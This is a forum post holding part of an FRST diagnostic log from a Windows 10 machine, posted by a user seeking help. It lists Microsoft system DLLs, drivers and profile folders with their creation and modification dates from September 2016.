2016-09-30 06:31 - 2016-09-15 18:16 - 01817088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2016-09-30 06:31 - 2016-09-15 18:16 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-09-30 06:31 - 2016-09-15 18:16 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe
2016-09-30 06:31 - 2016-08-06 05:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll
2016-09-30 06:31 - 2016-08-05 10:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll
2016-09-30 06:31 - 2016-08-05 10:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll
2016-09-30 06:30 - 2016-09-15 19:37 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-09-30 06:30 - 2016-09-15 19:29 - 00424640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll
2016-09-30 06:30 - 2016-09-15 19:29 - 00169056 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll
2016-09-30 06:30 - 2016-09-15 19:29 - 00074080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys
2016-09-30 06:30 - 2016-09-15 19:25 - 00280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeunlock.exe
2016-09-30 06:30 - 2016-09-15 19:24 - 01182048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-09-30 06:30 - 2016-09-15 19:22 - 00433832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2016-09-30 06:30 - 2016-09-15 19:21 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2016-09-30 06:30 - 2016-09-15 19:18 - 06654616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-09-30 06:30 - 2016-09-15 19:15 - 00557408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-09-30 06:30 - 2016-09-15 19:15 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-09-30 06:30 - 2016-09-15 19:14 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2016-09-30 06:30 - 2016-09-15 19:14 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2016-09-30 06:30 - 2016-09-15 19:12 - 04131464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-09-30 06:30 - 2016-09-15 19:12 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 22219328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01990640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01066104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00862064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00725664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2016-09-30 06:30 - 2016-09-15 19:08 - 05683712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-09-30 06:30 - 2016-09-15 19:07 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-09-30 06:30 - 2016-09-15 19:07 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-09-30 06:30 - 2016-09-15 19:07 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll
2016-09-30 06:30 - 2016-09-15 19:06 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-09-30 06:30 - 2016-09-15 19:01 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll
2016-09-30 06:30 - 2016-09-15 19:00 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2016-09-30 06:30 - 2016-09-15 18:59 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp
2016-09-30 06:30 - 2016-09-15 18:59 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2016-09-30 06:30 - 2016-09-15 18:59 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2016-09-30 06:30 - 2016-09-15 18:59 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2016-09-30 06:30 - 2016-09-15 18:56 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2016-09-30 06:30 - 2016-09-15 18:56 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2016-09-30 06:30 - 2016-09-15 18:56 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe
2016-09-30 06:30 - 2016-09-15 18:54 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-09-30 06:30 - 2016-09-15 18:54 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2016-09-30 06:30 - 2016-09-15 18:53 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2016-09-30 06:30 - 2016-09-15 18:53 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-09-30 06:30 - 2016-09-15 18:52 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2016-09-30 06:30 - 2016-09-15 18:52 - 00445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprapi.dll
2016-09-30 06:30 - 2016-09-15 18:52 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2016-09-30 06:30 - 2016-09-15 18:51 - 00762368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2016-09-30 06:30 - 2016-09-15 18:50 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2016-09-30 06:30 - 2016-09-15 18:50 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pwrshplugin.dll
2016-09-30 06:30 - 2016-09-15 18:49 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll
2016-09-30 06:30 - 2016-09-15 18:48 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2016-09-30 06:30 - 2016-09-15 18:46 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2016-09-30 06:30 - 2016-09-15 18:46 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2016-09-30 06:30 - 2016-09-15 18:46 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2016-09-30 06:30 - 2016-09-15 18:45 - 02749440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2016-09-30 06:30 - 2016-09-15 18:45 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-09-30 06:30 - 2016-09-15 18:45 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2016-09-30 06:30 - 2016-09-15 18:44 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2016-09-30 06:30 - 2016-09-15 18:44 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.MediaPlayer.dll
2016-09-30 06:30 - 2016-09-15 18:44 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2016-09-30 06:30 - 2016-09-15 18:43 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2016-09-30 06:30 - 2016-09-15 18:42 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BackgroundMediaPolicy.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2016-09-30 06:30 - 2016-09-15 18:40 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-09-30 06:30 - 2016-09-15 18:40 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmrdvcore.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 01507840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.FaceAnalysis.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SessEnv.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rshx32.dll
2016-09-30 06:30 - 2016-09-15 18:34 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 01145344 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2016-09-30 06:30 - 2016-09-15 18:33 - 00560128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2016-09-30 06:30 - 2016-09-15 18:31 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwrshplugin.dll
2016-09-30 06:30 - 2016-09-15 18:30 - 03776512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-09-30 06:30 - 2016-09-15 18:30 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2016-09-30 06:30 - 2016-09-15 18:30 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2016-09-30 06:30 - 2016-09-15 18:30 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Energy.dll
2016-09-30 06:30 - 2016-09-15 18:29 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-09-30 06:30 - 2016-09-15 18:28 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2016-09-30 06:30 - 2016-09-15 18:28 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2016-09-30 06:30 - 2016-09-15 18:27 - 00796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-09-30 06:30 - 2016-09-15 18:27 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAC3ENC.DLL
2016-09-30 06:30 - 2016-09-15 18:25 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2016-09-30 06:30 - 2016-09-15 18:24 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2016-09-30 06:30 - 2016-09-15 18:23 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2016-09-30 06:30 - 2016-09-15 18:23 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2016-09-30 06:30 - 2016-09-15 18:22 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-09-30 06:30 - 2016-09-15 18:20 - 01984512 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-09-30 06:30 - 2016-09-15 18:19 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-09-30 06:30 - 2016-09-15 18:18 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-09-30 06:30 - 2016-09-15 18:17 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2016-09-30 06:30 - 2016-09-15 18:16 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2016-09-30 06:30 - 2016-09-15 18:16 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-09-30 06:30 - 2016-09-15 18:16 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2016-09-30 06:30 - 2016-09-15 16:00 - 00445765 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-09-30 06:30 - 2016-08-06 05:33 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smphost.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2016-09-27 15:27 - 2016-09-28 06:07 - 00000000 ____D C:\Users\maikp\AppData\Local\ConnectedDevicesPlatform
2016-09-27 15:27 - 2016-09-27 15:27 - 00000656 __RSH C:\Users\maikp\ntuser.pol
2016-09-27 15:27 - 2016-09-27 15:27 - 00000020 ___SH C:\Users\maikp\ntuser.ini
2016-09-27 13:05 - 2016-09-27 12:24 - 00000000 ___DC C:\WINDOWS\Panther

RonnyP 18.10.2016 13:41
FRST 2/2
Code:
2016-09-27 13:02 - 2016-09-27 13:02 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmploc.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmploc.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 06574592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanmm.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 05384192 _____ (Microsoft) C:\WINDOWS\system32\dbgeng.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 04148224 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 03299328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 02852864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2016-09-27 13:02 - 2016-09-27 13:02 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2016-09-27 13:02 - 2016-09-27 13:02 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 02510848 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02481768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02370048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02360832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02315264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02256224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02183792 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02049480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01966288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01891328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01853232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01847048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01557296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01555456 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01453992 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
